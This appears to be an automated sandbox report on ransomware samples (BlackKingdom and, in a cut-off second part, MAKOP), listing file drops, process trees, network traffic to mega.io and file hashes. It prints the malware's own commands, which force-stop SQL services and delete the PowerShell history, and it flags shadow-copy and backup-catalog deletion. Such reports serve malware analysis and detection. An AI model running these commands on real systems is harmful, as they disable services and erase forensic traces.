File created C:\Users\Admin\Searches\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe N/A
File created C:\Users\Public\Desktop\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe N/A
File created C:\Users\Admin\Videos\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe N/A
File created C:\Users\Public\AccountPictures\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe N/A
File created C:\Users\Admin\Desktop\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe N/A
File created C:\Users\Admin\Pictures\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe N/A
File created C:\Users\Public\Downloads\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe N/A
File created C:\Users\Public\Music\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4260 wrote to memory of 3480 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe
PID 4260 wrote to memory of 3480 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe
PID 3480 wrote to memory of 3064 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe C:\Windows\system32\cmd.exe
PID 3480 wrote to memory of 3064 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe C:\Windows\system32\cmd.exe
PID 3064 wrote to memory of 3660 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3064 wrote to memory of 3660 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3480 wrote to memory of 3760 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe C:\Windows\system32\cmd.exe
PID 3480 wrote to memory of 3760 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe C:\Windows\system32\cmd.exe
PID 3760 wrote to memory of 1104 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3760 wrote to memory of 1104 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Processes

C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe"

C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c powershell Get-Service *sql*|Stop-Service -Force 2>$null

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Service *sql*

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c powershell rm (Get-PSReadlineOption).HistorySavePath

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell rm (Get-PSReadlineOption).HistorySavePath

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 22.160.190.20.in-addr.arpa udp
US 8.8.8.8:53 81.144.22.2.in-addr.arpa udp
US 8.8.8.8:53 43.58.199.20.in-addr.arpa udp
US 8.8.8.8:53 g.bing.com udp
US 13.107.21.237:443 g.bing.com tcp
US 8.8.8.8:53 237.21.107.13.in-addr.arpa udp
US 8.8.8.8:53 mega.io udp
LU 66.203.124.37:80 mega.io tcp
LU 66.203.124.37:443 mega.io tcp
US 8.8.8.8:53 g.api.mega.co.nz udp
LU 66.203.125.15:443 g.api.mega.co.nz tcp
US 8.8.8.8:53 37.124.203.66.in-addr.arpa udp
LU 66.203.125.15:443 g.api.mega.co.nz tcp
US 8.8.8.8:53 15.125.203.66.in-addr.arpa udp
US 8.8.8.8:53 103.169.127.40.in-addr.arpa udp
US 8.8.8.8:53 56.126.166.20.in-addr.arpa udp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp
US 8.8.8.8:53 172.214.232.199.in-addr.arpa udp
US 8.8.8.8:53 30.243.111.52.in-addr.arpa udp
US 8.8.8.8:53 100.58.20.217.in-addr.arpa udp
US 8.8.8.8:53 58.189.79.40.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\_MEI42602\ucrtbase.dll

MD5 298e85be72551d0cdd9ed650587cfdc6
SHA1 5a82bcc324fb28a5147b4e879b937fb8a56b760c
SHA256 eb89af5911a60d892a685181c397d32b72c61dc2ad77dd45b8cac0fbb7602b84
SHA512 3fafea5ff0d0b4e07f6354c37b367ada4da1b607186690c732364518a93c3fd2f5004014c9c3d23dde28db87d1cb9ae1259cda68b9ba757db59a59d387ac4e02

C:\Users\Admin\AppData\Local\Temp\_MEI42602\python37.dll

MD5 c4709f84e6cf6e082b80c80b87abe551
SHA1 c0c55b229722f7f2010d34e26857df640182f796
SHA256 ca8e39f2b1d277b0a24a43b5b8eada5baf2de97488f7ef2484014df6e270b3f3
SHA512 e04a5832b9f2e1e53ba096e011367d46e6710389967fa7014a0e2d4a6ce6fc8d09d0ce20cee7e7d67d5057d37854eddab48bef7df1767f2ec3a4ab91475b7ce4

C:\Users\Admin\AppData\Local\Temp\_MEI42602\VCRUNTIME140.dll

MD5 89a24c66e7a522f1e0016b1d0b4316dc
SHA1 5340dd64cfe26e3d5f68f7ed344c4fd96fbd0d42
SHA256 3096cafb6a21b6d28cf4fe2dd85814f599412c0fe1ef090dd08d1c03affe9ab6
SHA512 e88e0459744a950829cd508a93e2ef0061293ab32facd9d8951686cbe271b34460efd159fd8ec4aa96ff8a629741006458b166e5cff21f35d049ad059bc56a1a

C:\Users\Admin\AppData\Local\Temp\_MEI42602\_ctypes.pyd

MD5 5e869eebb6169ce66225eb6725d5be4a
SHA1 747887da0d7ab152e1d54608c430e78192d5a788
SHA256 430f1886caf059f05cde6eb2e8d96feb25982749a151231e471e4b8d7f54f173
SHA512 feb6888bb61e271b1670317435ee8653dedd559263788fbf9a7766bc952defd7a43e7c3d9f539673c262abedd97b0c4dd707f0f5339b1c1570db4e25da804a16

C:\Users\Admin\AppData\Local\Temp\_MEI42602\base_library.zip

MD5 a70f10b994f5b2e03777b4d355eef788
SHA1 141be3cef837cf6120f71c714259d9799586b483
SHA256 766089d80d0136ce9a4f24f1dd717a8575b0075c5d9c3c72b84807e0647ffa2c
SHA512 5651e26f0a3de35e455977d3cfc06e2b38defe5e52656e3213177a0a621eca3b3391bf414371cecf88d9ff903747231092b8d1d2206d5f020e1c438c70d8eb38

C:\Users\Admin\AppData\Local\Temp\_MEI42602\select.pyd

MD5 fb4a0d7abaeaa76676846ad0f08fefa5
SHA1 755fd998215511506edd2c5c52807b46ca9393b2
SHA256 65a3c8806d456e9df2211051ed808a087a96c94d38e23d43121ac120b4d36429
SHA512 f5b3557f823ee4c662f2c9b7ecc5497934712e046aa8ae8e625f41756beb5e524227355316f9145bfabb89b0f6f93a1f37fa94751a66c344c38ce449e879d35f

C:\Users\Admin\AppData\Local\Temp\_MEI42602\_ssl.pyd

MD5 5a393bb4f3ae499541356e57a766eb6a
SHA1 908f68f4ea1a754fd31edb662332cf0df238cf9a
SHA256 b6593b3af0e993fd5043a7eab327409f4bf8cdcd8336aca97dbe6325aefdb047
SHA512 958584fd4efaa5dd301cbcecbfc8927f9d2caec9e2826b2af9257c5eefb4b0b81dbbadbd3c1d867f56705c854284666f98d428dc2377ccc49f8e1f9bbbed158f

C:\Users\Admin\AppData\Local\Temp\_MEI42602\libssl-1_1.dll

MD5 bc778f33480148efa5d62b2ec85aaa7d
SHA1 b1ec87cbd8bc4398c6ebb26549961c8aab53d855
SHA256 9d4cf1c03629f92662fc8d7e3f1094a7fc93cb41634994464b853df8036af843
SHA512 80c1dd9d0179e6cc5f33eb62d05576a350af78b5170bfdf2ecda16f1d8c3c2d0e991a5534a113361ae62079fb165fff2344efd1b43031f1a7bfda696552ee173

C:\Users\Admin\AppData\Local\Temp\_MEI42602\_tkinter.pyd

MD5 09f66528018ffef916899845d6632307
SHA1 cf9ddad46180ef05a306dcb05fdb6f24912a69ce
SHA256 34d89fe378fc10351d127fb85427449f31595eccf9f5d17760b36709dd1449b9
SHA512 ed406792d8a533db71bd71859edbb2c69a828937757afec1a83fd1eacb1e5e6ec9afe3aa5e796fa1f518578f6d64ff19d64f64c9601760b7600a383efe82b3de

C:\Users\Admin\AppData\Local\Temp\_MEI42602\tcl\encoding\cp1252.enc

MD5 5900f51fd8b5ff75e65594eb7dd50533
SHA1 2e21300e0bc8a847d0423671b08d3c65761ee172
SHA256 14df3ae30e81e7620be6bbb7a9e42083af1ae04d94cf1203565f8a3c0542ace0
SHA512 ea0455ff4cd5c0d4afb5e79b671565c2aede2857d534e1371f0c10c299c74cb4ad113d56025f58b8ae9e88e2862f0864a4836fed236f5730360b2223fde479dc

C:\Users\Admin\AppData\Local\Temp\_MEI42602\_lzma.pyd

MD5 5fbb728a3b3abbdd830033586183a206
SHA1 066fde2fa80485c4f22e0552a4d433584d672a54
SHA256 f9bc6036d9e4d57d08848418367743fb608434c04434ab07da9dabe4725f9a9b
SHA512 31e7c9fe9d8680378f8e3ea4473461ba830df2d80a3e24e5d02a106128d048430e5d5558c0b99ec51c3d1892c76e4baa14d63d1ec1fc6b1728858aa2a255b2fb

C:\Users\Admin\AppData\Local\Temp\_MEI42602\unicodedata.pyd

MD5 4d3d8e16e98558ff9dac8fc7061e2759
SHA1 c918ab67b580f955b6361f9900930da38cec7c91
SHA256 016d962782beae0ea8417a17e67956b27610f4565cff71dd35a6e52ab187c095
SHA512 0dfabfad969da806bc9c6c664cdf31647d89951832ff7e4e5eeed81f1de9263ed71bddeff76ebb8e47d6248ad4f832cb8ad456f11e401c3481674bd60283991a

C:\Users\Admin\AppData\Local\Temp\_MEI42602\Crypto\Cipher\_raw_ofb.cp37-win_amd64.pyd

MD5 22d65fdceebad51d277a2d8db999b237
SHA1 f65ed91b8bab5c2766f4aeaa86580de0017770ad
SHA256 3a4a5aaaa9a80180601376412180b024dbd43c1a3c313dc408dcdd5ee208cd6a
SHA512 d574e7ba77d4bcea014742678608ce46b51b585a6cc8b6e2a2c064b426042c769083f5a74cebe00800283e6efc8f7b079ef0720c2a7bf51098b5f51978419dc9

C:\Users\Admin\AppData\Local\Temp\_MEI42602\Crypto\Hash\_BLAKE2s.cp37-win_amd64.pyd

MD5 f79a4c8843675e13fc0d4f057faec76a
SHA1 80f8d466d2a42a3b278db0f6edb7e60c2f5afa26
SHA256 e4f57da1c2ae72d2ab4980a2ffa370ac0cf1f3f8c76273dcea3c28fd5c858c1e
SHA512 7955edd12c426599c5103fc71d4fa051092584e5bf6755beee5bbb76977927093ec6b73eaec0276de6e3e28e4f3e1ca0507d1b4a85eeba14f2e5b6032401715d

C:\Users\Admin\AppData\Local\Temp\_MEI42602\Crypto\Cipher\_Salsa20.cp37-win_amd64.pyd

MD5 2b6eac8d1d5cd08279f4c711f84e3953
SHA1 c1b44d08dcf6fe7f50a1707d91f606b70538ce62
SHA256 a05ffcf7b30d87021f67dc94324f4e7e0481809b07f59cbc77b6798aeb319e7b
SHA512 827215a6894c20e9dde798a660ba49f5810d48d50f75cbbe88607254dbd5bad9518c612f1a06fdd932e3836e928ef9f04df7ce4800614e09ca74fffc0070b86d

C:\Users\Admin\AppData\Local\Temp\_MEI42602\Crypto\Hash\_MD5.cp37-win_amd64.pyd

MD5 9172a2fc5c66fff01f12676d16d8e882
SHA1 ee71eafd922f0ee24f1559c63dd8c82b16dbba00
SHA256 1143956ef572524ca0a4db6e55b918d7e3e137fa87d15df31ae4f8a4d5c6334b
SHA512 8a70a90edbac647d04444e5c926d7619d200632192e978fb56f9597583d3cd4ed8dcb5a0db89f0d3f89a41157388d51a3ab3eca7bc19d37da6917ca954ee0741

C:\Users\Admin\AppData\Local\Temp\_MEI42602\Crypto\Hash\_SHA256.cp37-win_amd64.pyd

MD5 fd2bab04dcf785080fd7e6aa1abdb566
SHA1 9eece186b95a4a6ffa8fadca283ebd2e1f60a340
SHA256 a660650ba2a0914d510d931458bf93a2e2479cf5922bd830f55ff74deebb19c9
SHA512 5ba2a7e097506c18c5ac74c0adac276b137b04185286fc7f2151dc7e7628c044a99d062b123c56dcf2d409dea1b9a5624a08899f5b7735a233f465317e8cfac5

C:\Users\Admin\AppData\Local\Temp\_MEI42602\Crypto\Hash\_SHA1.cp37-win_amd64.pyd

MD5 609daa8ccbefeda1291d663235c257eb
SHA1 3a7232f1f6c6b1c03963316c45b7ae335fd9ede6
SHA256 28cca9038d7f709a8cc251cc664195c68f65d61832547459fb8b3021044fe6da
SHA512 028a198e5c8b2f2f7bf8df716a06b5ffae0a875a9ac4d42c1bc64e4232e1d0700f79a01485a87c8fa7515e7c458912ef89487f4aea77fd769bd32e02ce3b1c64

C:\Users\Admin\AppData\Local\Temp\_MEI42602\Crypto\Util\_strxor.cp37-win_amd64.pyd

MD5 7d2ed7ed7b5f765f13123a905abdd190
SHA1 6c99d801d39c13f86352762d3c150f0c4ff2918b
SHA256 0dcbf6c5d564b77d40cc71096769ab89092b946dd8ebde2a0effb0c28b36ef3a
SHA512 9d5f307ae558ba62abc2b44b8dd3205a7a7c7524253662ba6f427288695aa41e02ac28785ab77b95a0961bff8b5860fd5b20b54438b280bf9f6cb2523dcedac6

C:\Users\Admin\AppData\Local\Temp\_MEI42602\Crypto\Cipher\_raw_ctr.cp37-win_amd64.pyd

MD5 d02012848d57be3b3967d379ea42426e
SHA1 69610f7f1f35830639cdcf74f99a20be5bb011c7
SHA256 cc1782f000f855b66ff94ddbb34dae3aa520c3fbb98b972c5561f2745791849d
SHA512 51f2dbc9f74b9190fa1f395cac5e8e1b60ac3181da169477e7510411700d42bdcf426285cce8a09983eaa84597621c892d5dc360c56231031e2fc702cddd1be1

C:\Users\Admin\AppData\Local\Temp\_MEI42602\Crypto\Cipher\_raw_cfb.cp37-win_amd64.pyd

MD5 00afcb334aa9cbc635ffb7864d487bca
SHA1 9b0c29dc4c01984ef63d2b868b7d27637aeabde2
SHA256 69e5945cde019e9dcdc23404e81fcc7dd2313eebf259daa3a5af537eaf418267
SHA512 ef1b73b5906713f9b90afc41c60a29d45a1630a6ab1c22be1cc7aa72dc5db7b7bc90dfce1eefda9167a98e911952f7232c5c0f1c4e043428d292cf64fbae284b

C:\Users\Admin\AppData\Local\Temp\_MEI42602\Crypto\Cipher\_raw_cbc.cp37-win_amd64.pyd

MD5 b768eda0fa972c9cd34cebc1e7c4b54e
SHA1 95967222a6902226e9bc94bc1503c1638fbcc7cc
SHA256 4e872e1aa9229a3e95a970af1b6a71c17c5ab84e53a57012c5c7c4412fafeb3f
SHA512 fcf4de7f5be68bb029cd5f6a6413ce3fc1db0ea3d58152b766f86ae1c81653ac9c1b303b8622bb2a34b254f1b9f33e8422b42642992936512d80f435e5229690

C:\Users\Admin\AppData\Local\Temp\_MEI42602\Crypto\Cipher\_raw_ecb.cp37-win_amd64.pyd

MD5 ea90e3f80b3f3d089e20514e52cae4bb
SHA1 2bd4a5e1b0871ef7ca753b635101216422260eee
SHA256 256f905da0b889b74dcc0ed69a090f26b92e82936e1b149ed1c6d413b45eff96
SHA512 8a8715842b1773386aa75a4eb7136cb8c43da3330e54eddf952469e165c59fe8ce3ed439db6b89e24d1640cec3c64ca2bb3d673727d6a90e9cbd161602d7692c

C:\Users\Admin\AppData\Local\Temp\_MEI42602\certifi\cacert.pem

MD5 1ba3b44f73a6b25711063ea5232f4883
SHA1 1b1a84804f896b7085924f8bf0431721f3b5bdbe
SHA256 bb77f13d3fbec9e98bbf28ac95046b44196c7d8f55ab7720061e99991a829197
SHA512 0dd2a14331308b1de757d56fab43678431e0ad6f5f5b12c32fa515d142bd955f8be690b724e07f41951dd03c9fee00e604f4e0b9309da3ea438c8e9b56ca581b

C:\Users\Admin\AppData\Local\Temp\_MEI42602\_cpyHook.cp37-win_amd64.pyd

MD5 3271deb52590ba75eadbd732e859ea51
SHA1 a001ed3664f9fb87a6b52411438157f4619f50fd
SHA256 dc80b2f6122ff5f6b8bb37068f602809e9d4e54eaed70b6ae5b22901c83b3993
SHA512 472d9dc42cceb0c569b8f40c3a9d5844dd131bad02e206f7f4fbdc48c6c109f770bd3a69af6d37482d2cea1a23bad58b1c1642caf905df056668127dc1c2adf8

C:\Users\Admin\AppData\Local\Temp\_MEI42602\_bz2.pyd

MD5 cf77513525fc652bad6c7f85e192e94b
SHA1 23ec3bb9cdc356500ec192cac16906864d5e9a81
SHA256 8bce02e8d44003c5301608b1722f7e26aada2a03d731fa92a48c124db40e2e41
SHA512 dbc1ba8794ce2d027145c78b7e1fc842ffbabb090abf9c29044657bdecd44396014b4f7c2b896de18aad6cfa113a4841a9ca567e501a6247832b205fe39584a9

C:\Users\Admin\AppData\Local\Temp\_MEI42602\_queue.pyd

MD5 c0a70188685e44e73576e3cd63fc1f68
SHA1 36f88ca5c1dda929b932d656368515e851aeb175
SHA256 e499824d58570c3130ba8ef1ac2d503e71f916c634b2708cc22e95c223f83d0a
SHA512 b9168bf1b98da4a9dfd7b1b040e1214fd69e8dfc2019774890291703ab48075c791cc27af5d735220bd25c47643f098820563dc537748471765aff164b00a4aa

C:\Users\Admin\AppData\Local\Temp\_MEI42602\tcl\init.tcl

MD5 b900811a252be90c693e5e7ae365869d
SHA1 345752c46f7e8e67dadef7f6fd514bed4b708fc5
SHA256 bc492b19308bc011cfcd321f1e6e65e6239d4eeb620cc02f7e9bf89002511d4a
SHA512 36b8cdba61b9222f65b055c0c513801f3278a3851912215658bcf0ce10f80197c1f12a5ca3054d8604da005ce08da8dcd303b8544706b642140a49c4377dd6ce

C:\Users\Admin\AppData\Local\Temp\_MEI42602\tk86t.dll

MD5 fdc8a5d96f9576bd70aa1cadc2f21748
SHA1 bae145525a18ce7e5bc69c5f43c6044de7b6e004
SHA256 1a6d0871be2fa7153de22be008a20a5257b721657e6d4b24da8b1f940345d0d5
SHA512 816ada61c1fd941d10e6bb4350baa77f520e2476058249b269802be826bab294a9c18edc5d590f5ed6f8dafed502ab7ffb29db2f44292cb5bedf2f5fa609f49c

C:\Users\Admin\AppData\Local\Temp\_MEI42602\tcl86t.dll

MD5 c0b23815701dbae2a359cb8adb9ae730
SHA1 5be6736b645ed12e97b9462b77e5a43482673d90
SHA256 f650d6bc321bcda3fc3ac3dec3ac4e473fb0b7b68b6c948581bcfc54653e6768
SHA512 ed60384e95be8ea5930994db8527168f78573f8a277f8d21c089f0018cd3b9906da764ed6fcc1bd4efad009557645e206fbb4e5baef9ab4b2e3c8bb5c3b5d725

C:\Users\Admin\AppData\Local\Temp\_MEI42602\_hashlib.pyd

MD5 b32cb9615a9bada55e8f20dcea2fbf48
SHA1 a9c6e2d44b07b31c898a6d83b7093bf90915062d
SHA256 ca4f433a68c3921526f31f46d8a45709b946bbd40f04a4cfc6c245cb9ee0eab5
SHA512 5c583292de2ba33a3fc1129dfb4e2429ff2a30eeaf9c0bcff6cca487921f0ca02c3002b24353832504c3eec96a7b2c507f455b18717bcd11b239bbbbd79fadbe

C:\Users\Admin\AppData\Local\Temp\_MEI42602\libcrypto-1_1.dll

MD5 cc4cbf715966cdcad95a1e6c95592b3d
SHA1 d5873fea9c084bcc753d1c93b2d0716257bea7c3
SHA256 594303e2ce6a4a02439054c84592791bf4ab0b7c12e9bbdb4b040e27251521f1
SHA512 3b5af9fbbc915d172648c2b0b513b5d2151f940ccf54c23148cd303e6660395f180981b148202bef76f5209acc53b8953b1cb067546f90389a6aa300c1fbe477

C:\Users\Admin\AppData\Local\Temp\_MEI42602\pywintypes37.dll

MD5 77b6875977e77c4619bbb471d5eaf790
SHA1 f08c3bc5e918c0a197fbfd1b15e7c0491bd5fade
SHA256 780a72ba3215ff413d5a9e98861d8bb87c15c43a75bb81dc985034ae7dcf5ef6
SHA512 783939fc97b2445dfe7e21eb6b71711aba6d85e275e489eddcc4f20c2ed018678d8d14c9e1856f66e3876f318312d69c22cee77f9105a72e56a1be4f3e8a7c2e

C:\Users\Admin\AppData\Local\Temp\_MEI42602\_socket.pyd

MD5 8ea18d0eeae9044c278d2ea7a1dbae36
SHA1 de210842da8cb1cb14318789575d65117d14e728
SHA256 9822c258a9d25062e51eafc45d62ed19722e0450a212668f6737eb3bfe3a41c2
SHA512 d275ce71d422cfaacef1220dc1f35afba14b38a205623e3652766db11621b2a1d80c5d0fb0a7df19402ebe48603e76b8f8852f6cbff95a181d33e797476029f0

memory/1104-1095-0x00007FFDCB1A3000-0x00007FFDCB1A5000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_yoyjlypg.4tt.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/1104-1105-0x00000218D01A0000-0x00000218D01C2000-memory.dmp

memory/1104-1106-0x00000218D23F0000-0x00000218D2434000-memory.dmp

memory/1104-1107-0x00000218D2440000-0x00000218D24B6000-memory.dmp

memory/1104-1108-0x00007FFDCB1A0000-0x00007FFDCBC61000-memory.dmp

memory/1104-1109-0x00007FFDCB1A0000-0x00007FFDCBC61000-memory.dmp

memory/1104-1112-0x00007FFDCB1A0000-0x00007FFDCBC61000-memory.dmp

C:\Recovery\decrypt_file.TxT

MD5 2772699925346e374b9a2031385cf42f
SHA1 dac85ee34a2b0e65623bbd572648ba73e5995fc6
SHA256 a5fa6416005be0c9de0e09faea13d40994292776c1036776282993dc6fb7bcf9
SHA512 081121b2aaf12e0f10b23b3d1423bfdf7ff36bdea199630852723c1aa25468390e73232fa56dd05a3bf6ed166bf695b0ac2ce03e33d0d0a3fc1b24c2d6e9ddfd

Analysis: behavioral31

Detonation Overview

Submitted

2024-07-07 14:07

Reported

2024-07-07 16:13

Platform

win7-20240704-en

Max time kernel

1798s

Max time network

1565s

Command Line

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe"

Signatures

Makop

ransomware makop

Deletes shadow copies

ransomware defense_evasion impact execution

Renames multiple (8801) files with added filename extension

ransomware

Deletes backup catalog

ransomware
Description Indicator Process Target
N/A N/A C:\Windows\system32\wbadmin.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe N/A
